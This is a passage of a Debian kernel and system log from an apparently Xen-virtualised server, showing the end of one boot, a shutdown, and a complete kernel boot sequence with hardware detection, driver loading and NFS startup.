1102May 15 11:32:35 debian kernel: [ 0.913109] input: AT Translated Set 2 keyboard as /devices/platform/i8042/serio0/input/input1
1103May 15 11:32:35 debian kernel: [ 0.913149] TCP cubic registered
1104May 15 11:32:35 debian kernel: [ 0.913401] NET: Registered protocol family 10
1105May 15 11:32:35 debian kernel: [ 0.913919] Mobile IPv6
1106May 15 11:32:35 debian kernel: [ 0.913921] NET: Registered protocol family 17
1107May 15 11:32:35 debian kernel: [ 0.913982] registered taskstats version 1
1108May 15 11:32:35 debian kernel: [ 0.914520] XENBUS: Device with no driver: device/vbd/768
1109May 15 11:32:35 debian kernel: [ 0.914521] XENBUS: Device with no driver: device/vbd/51728
1110May 15 11:32:35 debian kernel: [ 0.914522] XENBUS: Device with no driver: device/vbd/51744
1111May 15 11:32:35 debian kernel: [ 0.914523] XENBUS: Device with no driver: device/vif/0
1112May 15 11:32:35 debian kernel: [ 0.914524] XENBUS: Device with no driver: device/console/0
1113May 15 11:32:35 debian kernel: [ 0.914615] rtc_cmos 00:05: setting system clock to 2020-05-15 15:32:28 UTC (1589556748)
1114May 15 11:32:35 debian kernel: [ 0.914637] Initalizing network drop monitor service
1115May 15 11:32:35 debian kernel: [ 0.914715] Freeing unused kernel memory: 592k freed
1116May 15 11:32:35 debian kernel: [ 0.914839] Write protecting the kernel read-only data: 4236k
1117May 15 11:32:35 debian kernel: [ 0.927946] udev[78]: starting version 164
1118May 15 11:32:35 debian kernel: [ 0.951102] SCSI subsystem initialized
1119May 15 11:32:35 debian kernel: [ 0.952802] Initialising Xen virtual ethernet driver.
1120May 15 11:32:35 debian kernel: [ 0.962944] xvda: xvda1 xvda2 < xvda5 >
1121May 15 11:32:35 debian kernel: [ 0.966729] blkfront: xvdb: barriers enabled
1122May 15 11:32:35 debian kernel: [ 0.966929] xvdb:
1123May 15 11:32:35 debian kernel: [ 0.967282] unknown partition table
1124May 15 11:32:35 debian kernel: [ 0.968819] blkfront: xvdc: barriers enabled
1125May 15 11:32:35 debian kernel: [ 0.969086] xvdc: unknown partition table
1126May 15 11:32:35 debian kernel: [ 0.969540] scsi0 : ata_piix
1127May 15 11:32:35 debian kernel: [ 0.969713] scsi1 : ata_piix
1128May 15 11:32:35 debian kernel: [ 0.969759] ata1: PATA max MWDMA2 cmd 0x1f0 ctl 0x3f6 bmdma 0xc100 irq 14
1129May 15 11:32:35 debian kernel: [ 0.969761] ata2: PATA max MWDMA2 cmd 0x170 ctl 0x376 bmdma 0xc108 irq 15
1130May 15 11:32:35 debian kernel: [ 0.979084] FDC 0 is a S82078B
1131May 15 11:32:35 debian kernel: [ 1.176074] PM: Starting manual resume from disk
1132May 15 11:32:35 debian kernel: [ 1.185140] kjournald starting. Commit interval 5 seconds
1133May 15 11:32:35 debian kernel: [ 1.185151] EXT3-fs: mounted filesystem with ordered data mode.
1134May 15 11:32:35 debian kernel: [ 2.289584] udev[339]: starting version 164
1135May 15 11:32:35 debian kernel: [ 2.332372] input: Power Button as /devices/LNXSYSTM:00/LNXPWRBN:00/input/input2
1136May 15 11:32:35 debian kernel: [ 2.332379] ACPI: Power Button [PWRF]
1137May 15 11:32:35 debian kernel: [ 2.332437] input: Sleep Button as /devices/LNXSYSTM:00/LNXSLPBN:00/input/input3
1138May 15 11:32:35 debian kernel: [ 2.332441] ACPI: Sleep Button [SLPF]
1139May 15 11:32:35 debian kernel: [ 2.343205] processor LNXCPU:00: registered as cooling_device0
1140May 15 11:32:35 debian kernel: [ 2.343475] processor LNXCPU:01: registered as cooling_device1
1141May 15 11:32:35 debian kernel: [ 2.343728] processor LNXCPU:02: registered as cooling_device2
1142May 15 11:32:35 debian kernel: [ 2.343982] processor LNXCPU:03: registered as cooling_device3
1143May 15 11:32:35 debian kernel: [ 2.360726] input: PC Speaker as /devices/platform/pcspkr/input/input4
1144May 15 11:32:35 debian kernel: [ 2.820623] input: ImExPS/2 Generic Explorer Mouse as /devices/platform/i8042/serio1/input/input5
1145May 15 11:32:35 debian kernel: [ 5.629383] Adding 901112k swap on /dev/xvda5. Priority:-1 extents:1 across:901112k SS
1146May 15 11:32:35 debian kernel: [ 5.775956] EXT3 FS on xvda1, internal journal
1147May 15 11:32:35 debian kernel: [ 5.798673] loop: module loaded
1148May 15 11:32:35 debian kernel: [ 6.580711] RPC: Registered udp transport module.
1149May 15 11:32:35 debian kernel: [ 6.580713] RPC: Registered tcp transport module.
1150May 15 11:32:35 debian kernel: [ 6.580714] RPC: Registered tcp NFSv4.1 backchannel transport module.
1151May 15 11:32:35 debian kernel: [ 6.591513] Slow work thread pool: Starting up
1152May 15 11:32:35 debian kernel: [ 6.591740] Slow work thread pool: Ready
1153May 15 11:32:35 debian kernel: [ 6.591793] FS-Cache: Loaded
1154May 15 11:32:35 debian kernel: [ 6.605817] FS-Cache: Netfs 'nfs' registered for caching
1155May 15 11:32:35 debian kernel: [ 6.616039] Installing knfsd (copyright (C) 1996 okir@monad.swb.de).
1156May 15 11:32:35 debian kernel: [ 7.490118] svc: failed to register lockdv1 RPC service (errno 97).
1157May 15 11:32:35 debian kernel: [ 7.491624] NFSD: Using /var/lib/nfs/v4recovery as the NFSv4 state recovery directory
1158May 15 11:32:35 debian kernel: [ 7.492030] NFSD: starting 90-second grace period
1159May 15 11:35:57 debian shutdown[2323]: shutting down for system halt
1160May 15 11:35:58 debian kernel: [ 211.362471] nfsd: last server has exited, flushing export cache
1161May 15 11:36:04 debian kernel: Kernel logging (proc) stopped.
1162May 15 11:36:04 debian rsyslogd: [origin software="rsyslogd" swVersion="4.6.4" x-pid="1418" x-info="http://www.rsyslog.com"] exiting on signal 15.
1163Jan 17 19:55:44 debian kernel: imklog 4.6.4, log source = /proc/kmsg started.
1164Jan 17 19:55:44 debian rsyslogd: [origin software="rsyslogd" swVersion="4.6.4" x-pid="1562" x-info="http://www.rsyslog.com"] (re)start
1165Jan 17 19:55:44 debian kernel: [ 0.000000] Initializing cgroup subsys cpuset
1166Jan 17 19:55:44 debian kernel: [ 0.000000] Initializing cgroup subsys cpu
1167Jan 17 19:55:44 debian kernel: [ 0.000000] Linux version 2.6.32-5-amd64 (Debian 2.6.32-48squeeze6) (jmm@debian.org) (gcc version 4.3.5 (Debian 4.3.5-4) ) #1 SMP Tue May 13 16:34:35 UTC 2014
1168Jan 17 19:55:44 debian kernel: [ 0.000000] Command line: BOOT_IMAGE=/boot/vmlinuz-2.6.32-5-amd64 root=UUID=be5bb36f-7bb4-4900-b459-196278f714b6 ro quiet console=ttyS0
1169Jan 17 19:55:44 debian kernel: [ 0.000000] KERNEL supported cpus:
1170Jan 17 19:55:44 debian kernel: [ 0.000000] Intel GenuineIntel
1171Jan 17 19:55:44 debian kernel: [ 0.000000] AMD AuthenticAMD
1172Jan 17 19:55:44 debian kernel: [ 0.000000] Centaur CentaurHauls
1173Jan 17 19:55:44 debian kernel: [ 0.000000] BIOS-provided physical RAM map:
1174Jan 17 19:55:44 debian kernel: [ 0.000000] BIOS-e820: 0000000000000000 - 000000000009e000 (usable)
1175Jan 17 19:55:44 debian kernel: [ 0.000000] BIOS-e820: 000000000009e000 - 00000000000a0000 (reserved)
1176Jan 17 19:55:44 debian kernel: [ 0.000000] BIOS-e820: 00000000000e0000 - 0000000000100000 (reserved)
1177Jan 17 19:55:44 debian kernel: [ 0.000000] BIOS-e820: 0000000000100000 - 0000000020000000 (usable)
1178Jan 17 19:55:44 debian kernel: [ 0.000000] BIOS-e820: 00000000fc000000 - 0000000100000000 (reserved)
1179Jan 17 19:55:44 debian kernel: [ 0.000000] DMI 2.7 present.
1180Jan 17 19:55:44 debian kernel: [ 0.000000] last_pfn = 0x20000 max_arch_pfn = 0x400000000
1181Jan 17 19:55:44 debian kernel: [ 0.000000] x86 PAT enabled: cpu 0, old 0x7040600070406, new 0x7010600070106
1182Jan 17 19:55:44 debian kernel: [ 0.000000] init_memory_mapping: 0000000000000000-0000000020000000
1183Jan 17 19:55:44 debian kernel: [ 0.000000] RAMDISK: 17759000 - 1803fa59
1184Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: RSDP 00000000000ea020 00024 (v02 Xen)
1185Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: XSDT 00000000fc00e2a0 00054 (v01 Xen HVM 00000000 HVML 00000000)
1186Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: FACP 00000000fc00df60 000F4 (v04 Xen HVM 00000000 HVML 00000000)
1187Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: DSDT 00000000fc0021c0 0BD19 (v02 Xen HVM 00000000 INTL 20090123)
1188Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: FACS 00000000fc002180 00040
1189Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: APIC 00000000fc00e060 000D8 (v02 Xen HVM 00000000 HVML 00000000)
1190Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: HPET 00000000fc00e1b0 00038 (v01 Xen HVM 00000000 HVML 00000000)
1191Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: WAET 00000000fc00e1f0 00028 (v01 Xen HVM 00000000 HVML 00000000)
1192Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: SSDT 00000000fc00e220 00031 (v02 Xen HVM 00000000 INTL 20090123)
1193Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: SSDT 00000000fc00e260 00033 (v02 Xen HVM 00000000 INTL 20090123)
1194Jan 17 19:55:44 debian kernel: [ 0.000000] No NUMA configuration found
1195Jan 17 19:55:44 debian kernel: [ 0.000000] Faking a node at 0000000000000000-0000000020000000
1196Jan 17 19:55:44 debian kernel: [ 0.000000] Bootmem setup node 0 0000000000000000-0000000020000000
1197Jan 17 19:55:44 debian kernel: [ 0.000000] NODE_DATA [0000000000008000 - 000000000000ffff]
1198Jan 17 19:55:44 debian kernel: [ 0.000000] bootmap [0000000000010000 - 0000000000013fff] pages 4
1199Jan 17 19:55:44 debian kernel: [ 0.000000] (6 early reservations) ==> bootmem [0000000000 - 0020000000]
1200Jan 17 19:55:44 debian kernel: [ 0.000000] #0 [0000000000 - 0000001000] BIOS data page ==> [0000000000 - 0000001000]
1201Jan 17 19:55:44 debian kernel: [ 0.000000] #1 [0000006000 - 0000008000] TRAMPOLINE ==> [0000006000 - 0000008000]
1202Jan 17 19:55:44 debian kernel: [ 0.000000] #2 [0001000000 - 00016d7584] TEXT DATA BSS ==> [0001000000 - 00016d7584]
1203Jan 17 19:55:44 debian kernel: [ 0.000000] #3 [0017759000 - 001803fa59] RAMDISK ==> [0017759000 - 001803fa59]
1204Jan 17 19:55:44 debian kernel: [ 0.000000] #4 [000009e000 - 0000100000] BIOS reserved ==> [000009e000 - 0000100000]
1205Jan 17 19:55:44 debian kernel: [ 0.000000] #5 [00016d8000 - 00016d80c8] BRK ==> [00016d8000 - 00016d80c8]
1206Jan 17 19:55:44 debian kernel: [ 0.000000] found SMP MP-table at [ffff8800000fbc50] fbc50
1207Jan 17 19:55:44 debian kernel: [ 0.000000] Zone PFN ranges:
1208Jan 17 19:55:44 debian kernel: [ 0.000000] DMA 0x00000000 -> 0x00001000
1209Jan 17 19:55:44 debian kernel: [ 0.000000] DMA32 0x00001000 -> 0x00100000
1210Jan 17 19:55:44 debian kernel: [ 0.000000] Normal 0x00100000 -> 0x00100000
1211Jan 17 19:55:44 debian kernel: [ 0.000000] Movable zone start PFN for each node
1212Jan 17 19:55:44 debian kernel: [ 0.000000] early_node_map[2] active PFN ranges
1213Jan 17 19:55:44 debian kernel: [ 0.000000] 0: 0x00000000 -> 0x0000009e
1214Jan 17 19:55:44 debian kernel: [ 0.000000] 0: 0x00000100 -> 0x00020000
1215Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: PM-Timer IO Port: 0xb008
1216Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x00] lapic_id[0x00] enabled)
1217Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x01] lapic_id[0x00] disabled)
1218Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x02] lapic_id[0x00] disabled)
1219Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x03] lapic_id[0x00] disabled)
1220Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x04] lapic_id[0x00] disabled)
1221Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x05] lapic_id[0x00] disabled)
1222Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x06] lapic_id[0x00] disabled)
1223Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x07] lapic_id[0x00] disabled)
1224Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x08] lapic_id[0x00] disabled)
1225Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x09] lapic_id[0x00] disabled)
1226Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0a] lapic_id[0x00] disabled)
1227Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0b] lapic_id[0x00] disabled)
1228Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0c] lapic_id[0x00] disabled)
1229Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0d] lapic_id[0x00] disabled)
1230Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0e] lapic_id[0x00] disabled)
1231Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: IOAPIC (id[0x01] address[0xfec00000] gsi_base[0])
1232Jan 17 19:55:44 debian kernel: [ 0.000000] IOAPIC[0]: apic_id 1, version 17, address 0xfec00000, GSI 0-47
1233Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl)
1234Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 5 global_irq 5 low level)
1235Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 10 global_irq 10 low level)
1236Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 11 global_irq 11 low level)
1237Jan 17 19:55:44 debian kernel: [ 0.000000] Using ACPI (MADT) for SMP configuration information
1238Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: HPET id: 0x8086a201 base: 0xfed00000
1239Jan 17 19:55:44 debian kernel: [ 0.000000] SMP: Allowing 15 CPUs, 14 hotplug CPUs
1240Jan 17 19:55:44 debian kernel: [ 0.000000] Xen version 4.2.
1241Jan 17 19:55:44 debian kernel: [ 0.000000] Netfront and the Xen platform PCI driver have been compiled for this kernel: unplug emulated NICs.
1242Jan 17 19:55:44 debian kernel: [ 0.000000] Blkfront and the Xen platform PCI driver have been compiled for this kernel: unplug emulated disks.
1243Jan 17 19:55:44 debian kernel: [ 0.000000] You might have to change the root device
1244Jan 17 19:55:44 debian kernel: [ 0.000000] from /dev/hd[a-d] to /dev/xvd[a-d]
1245Jan 17 19:55:44 debian kernel: [ 0.000000] in your root= kernel command line option
1246Jan 17 19:55:44 debian kernel: [ 0.000000] PM: Registered nosave memory: 000000000009e000 - 00000000000a0000
1247Jan 17 19:55:44 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000000a0000 - 00000000000e0000
1248Jan 17 19:55:44 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000000e0000 - 0000000000100000
1249Jan 17 19:55:44 debian kernel: [ 0.000000] Allocating PCI resources starting at 20000000 (gap: 20000000:dc000000)
1250Jan 17 19:55:44 debian kernel: [ 0.000000] Booting paravirtualized kernel on Xen
1251Jan 17 19:55:44 debian kernel: [ 0.000000] NR_CPUS:512 nr_cpumask_bits:512 nr_cpu_ids:15 nr_node_ids:1
1252Jan 17 19:55:44 debian kernel: [ 0.000000] PERCPU: Embedded 30 pages/cpu @ffff880001800000 s90392 r8192 d24296 u131072
1253Jan 17 19:55:44 debian kernel: [ 0.000000] pcpu-alloc: s90392 r8192 d24296 u131072 alloc=1*2097152
1254Jan 17 19:55:44 debian kernel: [ 0.000000] pcpu-alloc: [0] 00 01 02 03 04 05 06 07 08 09 10 11 12 13 14 --
1255Jan 17 19:55:44 debian kernel: [ 0.000000] Built 1 zonelists in Node order, mobility grouping on. Total pages: 129081
1256Jan 17 19:55:44 debian kernel: [ 0.000000] Policy zone: DMA32
1257Jan 17 19:55:44 debian kernel: [ 0.000000] Kernel command line: BOOT_IMAGE=/boot/vmlinuz-2.6.32-5-amd64 root=UUID=be5bb36f-7bb4-4900-b459-196278f714b6 ro quiet console=ttyS0
1258Jan 17 19:55:44 debian kernel: [ 0.000000] PID hash table entries: 2048 (order: 2, 16384 bytes)
1259Jan 17 19:55:44 debian kernel: [ 0.000000] Initializing CPU#0
1260Jan 17 19:55:44 debian kernel: [ 0.000000] xsave/xrstor: enabled xstate_bv 0x7, cntxt size 0x340
1261Jan 17 19:55:44 debian kernel: [ 0.000000] Checking aperture...
1262Jan 17 19:55:44 debian kernel: [ 0.000000] No AGP bridge found
1263Jan 17 19:55:44 debian kernel: [ 0.000000] Memory: 497460k/524288k available (3087k kernel code, 392k absent, 26436k reserved, 2036k data, 592k init)
1264Jan 17 19:55:44 debian kernel: [ 0.000000] SLUB: Genslabs=14, HWalign=64, Order=0-3, MinObjects=0, CPUs=15, Nodes=1
1265Jan 17 19:55:44 debian kernel: [ 0.000000] Hierarchical RCU implementation.
1266Jan 17 19:55:44 debian kernel: [ 0.000000] NR_IRQS:4352 nr_irqs:936
1267Jan 17 19:55:44 debian kernel: [ 0.000000] Xen HVM callback vector for event delivery is enabled
1268Jan 17 19:55:44 debian kernel: [ 0.000000] Console: colour VGA+ 80x25
1269Jan 17 19:55:44 debian kernel: [ 0.000000] console [ttyS0] enabled
1270Jan 17 19:55:44 debian kernel: [ 0.000000] Detected 2400.068 MHz processor.
1271Jan 17 19:55:44 debian kernel: [ 0.008000] Calibrating delay loop (skipped), value calculated using timer frequency.. 4800.13 BogoMIPS (lpj=9600272)
1272Jan 17 19:55:44 debian kernel: [ 0.008000] Security Framework initialized
1273Jan 17 19:55:44 debian kernel: [ 0.008000] SELinux: Disabled at boot.
1274Jan 17 19:55:44 debian kernel: [ 0.008000] Dentry cache hash table entries: 65536 (order: 7, 524288 bytes)
1275Jan 17 19:55:44 debian kernel: [ 0.008000] Inode-cache hash table entries: 32768 (order: 6, 262144 bytes)
1276Jan 17 19:55:44 debian kernel: [ 0.008000] Mount-cache hash table entries: 256
1277Jan 17 19:55:44 debian kernel: [ 0.008000] Initializing cgroup subsys ns
1278Jan 17 19:55:44 debian kernel: [ 0.008000] Initializing cgroup subsys cpuacct
1279Jan 17 19:55:44 debian kernel: [ 0.008000] Initializing cgroup subsys devices
1280Jan 17 19:55:44 debian kernel: [ 0.008000] Initializing cgroup subsys freezer
1281Jan 17 19:55:44 debian kernel: [ 0.008000] Initializing cgroup subsys net_cls
1282Jan 17 19:55:44 debian kernel: [ 0.008000] CPU: Physical Processor ID: 0
1283Jan 17 19:55:44 debian kernel: [ 0.008000] CPU: L1 I cache: 32K, L1 D cache: 32K
1284Jan 17 19:55:44 debian kernel: [ 0.008000] CPU: L2 cache: 256K
1285Jan 17 19:55:44 debian kernel: [ 0.008000] CPU: L3 cache: 30720K
1286Jan 17 19:55:44 debian kernel: [ 0.008000] CPU 0/0x0 -> Node 0
1287Jan 17 19:55:44 debian kernel: [ 0.008000] mce: CPU supports 2 MCE banks
1288Jan 17 19:55:44 debian kernel: [ 0.008000] Performance Events: unsupported p6 CPU model 63 no PMU driver, software events only.
1289Jan 17 19:55:44 debian kernel: [ 0.008000] SMP alternatives: switching to UP code
1290Jan 17 19:55:44 debian kernel: [ 0.024870] ACPI: Core revision 20090903
1291Jan 17 19:55:44 debian kernel: [ 0.027609] Not enabling x2apic, Intr-remapping init failed.
1292Jan 17 19:55:44 debian kernel: [ 0.027611] Setting APIC routing to physical flat
1293Jan 17 19:55:44 debian kernel: [ 0.028367] ..TIMER: vector=0x30 apic1=0 pin1=2 apic2=0 pin2=0
1294Jan 17 19:55:44 debian kernel: [ 0.132003] CPU0: Intel(R) Xeon(R) CPU E5-2676 v3 @ 2.40GHz stepping 02
1295Jan 17 19:55:44 debian kernel: [ 0.132019] installing Xen timer for CPU 0
1296Jan 17 19:55:44 debian kernel: [ 0.132127] Brought up 1 CPUs
1297Jan 17 19:55:44 debian kernel: [ 0.132129] Total of 1 processors activated (4800.13 BogoMIPS).
1298Jan 17 19:55:44 debian kernel: [ 0.132599] devtmpfs: initialized
1299Jan 17 19:55:44 debian kernel: [ 0.134154] regulator: core version 0.5
1300Jan 17 19:55:44 debian kernel: [ 0.134187] NET: Registered protocol family 16
1301Jan 17 19:55:44 debian kernel: [ 0.134277] ACPI: bus type pci registered
1302Jan 17 19:55:44 debian kernel: [ 0.134781] PCI: Using configuration type 1 for base access
1303Jan 17 19:55:44 debian kernel: [ 0.134964] bio: create slab <bio-0> at 0
1304Jan 17 19:55:44 debian kernel: [ 0.180504] ACPI: Interpreter enabled
1305Jan 17 19:55:44 debian kernel: [ 0.180506] ACPI: (supports S0 S3 S4 S5)
1306Jan 17 19:55:44 debian kernel: [ 0.180517] ACPI: Using IOAPIC for interrupt routing
1307Jan 17 19:55:44 debian kernel: [ 0.264015] ACPI: No dock devices found.
1308Jan 17 19:55:44 debian kernel: [ 0.264190] ACPI: PCI Root Bridge [PCI0] (0000:00)
1309Jan 17 19:55:44 debian kernel: [ 0.270647] * Found PM-Timer Bug on the chipset. Due to workarounds for a bug,
1310Jan 17 19:55:44 debian kernel: [ 0.270648] * this clock source is slow. Consider trying other clock sources
1311Jan 17 19:55:44 debian kernel: [ 0.272151] pci 0000:00:01.3: quirk: region b000-b03f claimed by PIIX4 ACPI
1312Jan 17 19:55:44 debian kernel: [ 0.535472] ACPI: PCI Interrupt Link [LNKA] (IRQs *5 10 11)
1313Jan 17 19:55:44 debian kernel: [ 0.535913] ACPI: PCI Interrupt Link [LNKB] (IRQs 5 *10 11)
1314Jan 17 19:55:44 debian kernel: [ 0.536298] ACPI: PCI Interrupt Link [LNKC] (IRQs 5 10 *11)
1315Jan 17 19:55:44 debian kernel: [ 0.536733] ACPI: PCI Interrupt Link [LNKD] (IRQs *5 10 11)
1316Jan 17 19:55:44 debian kernel: [ 0.537047] vgaarb: device added: PCI:0000:00:02.0,decodes=io+mem,owns=io+mem,locks=none
1317Jan 17 19:55:44 debian kernel: [ 0.537049] vgaarb: loaded
1318Jan 17 19:55:44 debian kernel: [ 0.537091] PCI: Using ACPI for IRQ routing
1319Jan 17 19:55:44 debian kernel: [ 0.537927] HPET: 3 timers in total, 0 timers will be used for per-cpu timer
1320Jan 17 19:55:44 debian kernel: [ 0.537942] hpet0: at MMIO 0xfed00000, IRQs 2, 8, 0
1321Jan 17 19:55:44 debian kernel: [ 0.537944] hpet0: 3 comparators, 64-bit 62.500000 MHz counter
1322Jan 17 19:55:44 debian kernel: [ 0.544013] Switching to clocksource xen
1323Jan 17 19:55:44 debian kernel: [ 0.544701] pnp: PnP ACPI init
1324Jan 17 19:55:44 debian kernel: [ 0.544706] ACPI: bus type pnp registered
1325Jan 17 19:55:44 debian kernel: [ 0.616781] pnp: PnP ACPI: found 12 devices
1326Jan 17 19:55:44 debian kernel: [ 0.616783] ACPI: ACPI bus type pnp unregistered
1327Jan 17 19:55:44 debian kernel: [ 0.616790] system 00:00: iomem range 0x0-0x9ffff could not be reserved
1328Jan 17 19:55:44 debian kernel: [ 0.616794] system 00:03: ioport range 0x8a0-0x8a3 has been reserved
1329Jan 17 19:55:44 debian kernel: [ 0.616795] system 00:03: ioport range 0xcc0-0xccf has been reserved
1330Jan 17 19:55:44 debian kernel: [ 0.616797] system 00:03: ioport range 0x4d0-0x4d1 has been reserved
1331Jan 17 19:55:44 debian kernel: [ 0.616801] system 00:0b: ioport range 0x10c0-0x1141 has been reserved
1332Jan 17 19:55:44 debian kernel: [ 0.616802] system 00:0b: ioport range 0xb044-0xb047 has been reserved
1333Jan 17 19:55:44 debian kernel: [ 0.629103] NET: Registered protocol family 2
1334Jan 17 19:55:44 debian kernel: [ 0.629154] IP route cache hash table entries: 4096 (order: 3, 32768 bytes)
1335Jan 17 19:55:44 debian kernel: [ 0.629278] TCP established hash table entries: 16384 (order: 6, 262144 bytes)
1336Jan 17 19:55:44 debian kernel: [ 0.629319] TCP bind hash table entries: 16384 (order: 6, 262144 bytes)
1337Jan 17 19:55:44 debian kernel: [ 0.629351] TCP: Hash tables configured (established 16384 bind 16384)
1338Jan 17 19:55:44 debian kernel: [ 0.629352] TCP reno registered
1339Jan 17 19:55:44 debian kernel: [ 0.629438] NET: Registered protocol family 1
1340Jan 17 19:55:44 debian kernel: [ 0.629446] pci 0000:00:00.0: Limiting direct PCI/PCI transfers
1341Jan 17 19:55:44 debian kernel: [ 0.629540] pci 0000:00:01.0: PIIX3: Enabling Passive Release
1342Jan 17 19:55:44 debian kernel: [ 0.629605] pci 0000:00:01.0: Activating ISA DMA hang workarounds
1343Jan 17 19:55:44 debian kernel: [ 0.629702] Unpacking initramfs...
1344Jan 17 19:55:44 debian kernel: [ 1.002144] Freeing initrd memory: 9114k freed
1345Jan 17 19:55:44 debian kernel: [ 1.004042] audit: initializing netlink socket (disabled)
1346Jan 17 19:55:44 debian kernel: [ 1.004049] type=2000 audit(1610931219.820:1): initialized
1347Jan 17 19:55:44 debian kernel: [ 1.022606] HugeTLB registered 2 MB page size, pre-allocated 0 pages
1348Jan 17 19:55:44 debian kernel: [ 1.023264] VFS: Disk quotas dquot_6.5.2
1349Jan 17 19:55:44 debian kernel: [ 1.023291] Dquot-cache hash table entries: 512 (order 0, 4096 bytes)
1350Jan 17 19:55:44 debian kernel: [ 1.023338] msgmni has been set to 989
1351Jan 17 19:55:44 debian kernel: [ 1.023438] alg: No test for stdrng (krng)
1352Jan 17 19:55:44 debian kernel: [ 1.023465] Block layer SCSI generic (bsg) driver version 0.4 loaded (major 253)
1353Jan 17 19:55:44 debian kernel: [ 1.023466] io scheduler noop registered
1354Jan 17 19:55:44 debian kernel: [ 1.023467] io scheduler anticipatory registered
1355Jan 17 19:55:44 debian kernel: [ 1.023468] io scheduler deadline registered
1356Jan 17 19:55:44 debian kernel: [ 1.023502] io scheduler cfq registered (default)
1357Jan 17 19:55:44 debian kernel: [ 1.023726] xen-platform-pci 0000:00:03.0: PCI INT A -> GSI 28 (level, low) -> IRQ 28
1358Jan 17 19:55:44 debian kernel: [ 1.023752] Grant table initialized
1359Jan 17 19:55:44 debian kernel: [ 1.025195] Linux agpgart interface v0.103
1360Jan 17 19:55:44 debian kernel: [ 1.025212] Serial: 8250/16550 driver, 4 ports, IRQ sharing enabled
1361Jan 17 19:55:44 debian kernel: [ 1.026935] serial8250: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A
1362Jan 17 19:55:44 debian kernel: [ 1.029317] 00:0a: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A
1363Jan 17 19:55:44 debian kernel: [ 1.029436] input: Macintosh mouse button emulation as /devices/virtual/input/input0
1364Jan 17 19:55:44 debian kernel: [ 1.029494] PNP: PS/2 Controller [PNP0303:PS2K,PNP0f13:PS2M] at 0x60,0x64 irq 1,12
1365Jan 17 19:55:44 debian kernel: [ 1.032600] serio: i8042 KBD port at 0x60,0x64 irq 1
1366Jan 17 19:55:44 debian kernel: [ 1.032603] serio: i8042 AUX port at 0x60,0x64 irq 12
1367Jan 17 19:55:44 debian kernel: [ 1.032657] mice: PS/2 mouse device common for all mice
1368Jan 17 19:55:44 debian kernel: [ 1.033794] input: AT Translated Set 2 keyboard as /devices/platform/i8042/serio0/input/input1
1369Jan 17 19:55:44 debian kernel: [ 1.034500] rtc_cmos 00:05: rtc core: registered rtc_cmos as rtc0
1370Jan 17 19:55:44 debian kernel: [ 1.034576] rtc0: alarms up to one day, 114 bytes nvram, hpet irqs
1371Jan 17 19:55:44 debian kernel: [ 1.034582] cpuidle: using governor ladder
1372Jan 17 19:55:44 debian kernel: [ 1.034583] cpuidle: using governor menu
1373Jan 17 19:55:44 debian kernel: [ 1.034586] No iBFT detected.
1374Jan 17 19:55:44 debian kernel: [ 1.034763] TCP cubic registered
1375Jan 17 19:55:44 debian kernel: [ 1.034827] NET: Registered protocol family 10
1376Jan 17 19:55:44 debian kernel: [ 1.035237] Mobile IPv6
1377Jan 17 19:55:44 debian kernel: [ 1.035239] NET: Registered protocol family 17
1378Jan 17 19:55:44 debian kernel: [ 1.035282] registered taskstats version 1
1379Jan 17 19:55:44 debian kernel: [ 1.036085] XENBUS: Device with no driver: device/vbd/768
1380Jan 17 19:55:44 debian kernel: [ 1.036087] XENBUS: Device with no driver: device/vbd/51824
1381Jan 17 19:55:44 debian kernel: [ 1.036087] XENBUS: Device with no driver: device/vif/0
1382Jan 17 19:55:44 debian kernel: [ 1.036088] XENBUS: Device with no driver: device/console/0
1383Jan 17 19:55:44 debian kernel: [ 1.036118] rtc_cmos 00:05: setting system clock to 2021-01-18 00:53:39 UTC (1610931219)
1384Jan 17 19:55:44 debian kernel: [ 1.036138] Initalizing network drop monitor service
1385Jan 17 19:55:44 debian kernel: [ 1.036154] Freeing unused kernel memory: 592k freed
1386Jan 17 19:55:44 debian kernel: [ 1.036268] Write protecting the kernel read-only data: 4236k
